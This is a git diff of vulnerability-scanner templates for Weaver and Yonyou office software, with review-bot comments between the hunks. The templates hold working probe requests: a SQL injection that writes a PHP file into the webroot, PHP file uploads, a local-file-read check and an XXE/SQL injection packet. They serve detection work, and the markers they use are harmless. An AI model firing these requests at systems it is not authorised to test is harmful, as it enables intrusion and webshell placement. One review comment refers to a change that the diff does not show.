b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml index 1e63c77915..0f620f1e92 100644 --- a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml @@ -39,7 +39,15 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - status_code == 200 - contains(body,'Windows IP Configuration') + condition: and + + - type: word + part: header + words: + - "application/json" + - "text/html" + negative: true condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml index 4a34c16335..ee7fd28463 100644 --- a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml @@ -35,7 +35,7 @@ http: skip-variables-check: true matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')" - "status_code_2 == 200 && contains(header_2, 'filename=')" - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)" 
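Review bot: The new `num1`/`num2` range of 40000–44800 in the `variables:` block is tight for a reason the hunk never states: the product is fed through T-SQL `str()`, whose default length is 10 characters, and the largest product 44800*44800 = 2007040000 is exactly 10 digits and still below the 32-bit int maximum, so widening the range would make `str()` return asterisks or overflow and the `{{result}}` match would silently stop firing. Add a comment above `num1:` such as `# keep num1*num2 within 10 digits: str() defaults to length 10 and the product must fit in an int`. The file also ends with `\ No newline at end of file` after this change; add the trailing newline.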
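Review bot: In the weaver-e-mobile-rce hunk the added header matcher lists `application/json` and `text/html` with `condition: and` and `negative: true`; `negative` inverts the whole matcher, so it only rejects responses whose headers contain both strings, and a plain `text/html` error page still passes. If the intent is to exclude either content type, the word list needs `condition: or`, which once negated is true only when neither string appears. A short comment on the matcher, e.g. `# exclude HTML/JSON responses, which cannot be the command output the dsl matcher expects`, would make the intent reviewable next time.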
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml index a852d8407d..203a8ba0b0 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml @@ -21,8 +21,8 @@ variables: http: - method: GET path: - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)" - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version" + # - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)" + - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=" stop-at-first-match: true matchers: diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml index 37c185a222..b1b7a7bf2f 100755 --- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml @@ -17,7 +17,7 @@ info: variables: filename: "{{to_lower(rand_base(5))}}" - payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{(unknown)}.php']" + payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{(unknown)}.php']" http: - raw: @@ -35,9 +35,7 @@ http: - type: word part: body_2 words: - - "PHP Version" - - "PHP Extension" - condition: and + - "758058d8987e7a9ec723bcdbec6c407e" - type: status status: diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml index 901bd23ef0..c64cb2adf5 100755 --- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml 
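Review bot: The getsqldata hunk empties the query to `getSqlData?sql=` and comments out the MD5 probe instead of deleting it; the matchers that decide on a hit sit below the hunk and are not visible here, so whatever they look for must now be produced by an empty `sql` parameter, otherwise this is a false negative on every host. Either add a comment stating what an empty `sql` returns that the matchers key on, or remove the commented-out path rather than keeping it as dead YAML. The `{{num}}` variable from the `variables:` block above appears to be unused after this change and can probably go too.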
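Review bot: The second weaver-group-xml-sqli hunk replaces the `PHP Version`/`PHP Extension` words with the bare constant `758058d8987e7a9ec723bcdbec6c407e` and nothing in the file says what it is; the same literal is introduced in weaver-office-server-file-upload.yaml later in this commit, where the payload is `md5(weaver)`, so presumably it is that digest. The value written by the `into outfile` query in the first hunk of this file is shown as an empty string `''` (possibly redacted in this view), so I cannot confirm from the hunk that the written file ever emits it. Put the derivation next to the matcher, e.g. `# md5 of the marker written by the injected outfile; keep in sync with the payload variable`, or compute it in place with `{{md5('weaver')}}` so the two cannot drift.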
@@ -51,7 +51,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200" - "status_code_3 == 200 && contains(body_3,'{{string}}')" - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml index ded95bff68..aa034a39c5 100755 --- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml @@ -43,7 +43,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')" - "contains(body_2, '{{result}}') && status_code_2 == 200" condition: and diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml index 46aea1864c..f8665fcc3d 100755 --- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml @@ -10,7 +10,7 @@ info: max-request: 1 fofa-query: app="泛微-EOffice" verified: true - tags: weaver,e-office,oa,instrusive,rce + tags: weaver,e-office,intrusive,rce,file-upload variables: filename: "{{to_lower(rand_base(5))}}" @@ -59,7 +59,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200" - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')" - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" diff --git a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml index 965c468ad5..a9c42554d5 100644 --- a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml +++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml 
@@ -33,7 +33,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains(body_1,'{{timestamp}}')" - "status_code_2 == 200 && contains(body_2,'新建')" - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml index a9090fb0cf..26a4134b10 100755 --- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml @@ -1,7 +1,7 @@ id: weaver-office-server-file-upload info: - name: OA E-Office OfficeServer.php Arbitrary File Upload + name: OA E-Office OfficeServer.php Arbitrary File Upload author: SleepingBag945 severity: critical description: | @@ -12,7 +12,7 @@ info: max-request: 1 fofa-query: app="泛微-EOffice" verified: true - tags: weaver,e-office,oa,rce,intrusive,file-upload + tags: weaver,e-office,oa,rce,intrusive,fileupload variables: filename: "{{to_lower(rand_base(5))}}" @@ -31,9 +31,7 @@ http: Content-Disposition: form-data;name="FileData";filename="{(unknown)}.php" Content-Type: application/octet-stream - <?php - phpinfo(); - ?> + <?php echo md5(weaver);?>' ------WebKitFormBoundaryLpoiBFy4ANA8daew Content-Disposition: form-data;name="FormData" @@ -50,9 +48,7 @@ http: - type: word part: body_2 words: - - "PHP Version" - - "PHP Extension" - condition: and + - "758058d8987e7a9ec723bcdbec6c407e" - type: status status: diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml index c3017184b9..cc50a7c997 100755 --- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml @@ -24,8 +24,8 @@ http: - type: word part: body words: - - "datapassword" - - "datauser" + - "datapassword =" + - "datauser =" condition: and - type: status 
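Review bot: The third weaver-office-server hunk changes the uploaded body to `<?php echo md5(weaver);?>'`: `weaver` is an unquoted bare word, which PHP 7 only accepts with a warning and PHP 8 rejects as an undefined constant, so on current PHP nothing is printed and the new `758058d8987e7a9ec723bcdbec6c407e` matcher yields a false negative; the `'` after `?>` also looks like a stray character. Quote the string and drop the trailing quote, and note in a comment that the matcher constant is the md5 of that literal. The tag rename `file-upload` → `fileupload` in the second hunk goes the opposite way from yonyou-filereceiveservlet-fileupload.yaml and yonyou-u8-crm-fileupload.yaml in this same commit, which switch `fileupload` → `file-upload`, while weaver-lazyuploadify adds `file-upload` and tongda keeps `fileupload`; settle on one spelling so `-tags` filtering selects all of them.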
diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index b34c91983f..c5ffdcbcc3 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -44,7 +44,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200" - "contains(body_2, 'imageSrc') && contains(body_2, 'height')" - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml index 51647b3a29..c9ae09300c 100755 --- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml @@ -11,7 +11,7 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml metadata: fofa-query: app="泛微-协同办公OA" - tags: ecology,upload,fileupload,intrusive + tags: ecology,fileupload,intrusive variables: filename: "{{to_lower(rand_base(5))}}" @@ -65,12 +65,12 @@ http: internal: true group: 1 regex: - - "&fileid=(.*?)\'>" + - "&fileid=(.*?)\\'>" matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')" - "status_code_2 == 200 && contains(body_2, 'println')" - "status_code_3 == 200 && contains(body_3,'{{string}}')" diff --git a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml index 7bf1c2d19c..eda14230b5 100755 --- a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml 
@@ -9,7 +9,7 @@ info: reference: | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 2 + max-request: 2 fofa-query: body="远程通CHANJET_Remote" verified: true tags: yonyou,chanjet,sqli diff --git a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml index 876afbcecc..cd227fa523 100755 --- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml @@ -12,7 +12,7 @@ info: max-request: 1 fofa-query: app="用友-UFIDA-NC" verified: true - tags: yonyou,fileupload,intrusive + tags: yonyou,file-upload,intrusive variables: file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml index 07588ff47c..4a8f9d142f 100755 --- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml +++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml @@ -9,6 +9,11 @@ info: - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html tags: yonyou,grp,xxe,sqli +variables: + num1: "{{rand_int(800000, 999999)}}" + num2: "{{rand_int(800000, 999999)}}" + result: "{{to_number(num1)*to_number(num2)}}" + http: - raw: - | 
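Review bot: The new `num1`/`num2` range 800000–999999 in the yonyou-grp-u8 `variables:` block yields products of up to about 1e12, well beyond a 32-bit integer; the query in the next hunk is a bare `select {{num1}}*{{num2}}`, and if the backend treats the literals as `int` (SQL Server does) the multiplication raises an arithmetic overflow instead of returning the product, so `{{result}}` never appears and the check fails closed. The constants it replaces, 42540*41369, fit in an int, which is probably why they were chosen. Use a range whose product stays below 2147483647, e.g. `num1: "{{rand_int(10000, 40000)}}"` and the same for `num2`, and record the reason in a comment above them.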
@@ -17,13 +22,14 @@ http: Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip - cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e + cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e matchers-condition: and matchers: - type: word + part: body words: - - "1759837260" + - "{{result}}" - type: word words: diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index c6b814fe88..dd24e1b370 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml @@ -10,9 +10,9 @@ info: - https://www.seebug.org/vuldb/ssvid-99547 - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py metadata: - max-request: 2 + max-request: 2 fofa-query: app="用友-UFIDA-NC - verified: true + verified: true tags: yonyou,intrusive,ufida,fileupload variables: 
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml index 48a7a4d7d6..91eeb60c80 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml @@ -10,7 +10,7 @@ info: max-request: 2 fofa-query: body="用友U8CRM" verified: true - tags: yonyou,fileupload,u8-crm + tags: yonyou,file-upload,u8-crm,intrusive http: - raw: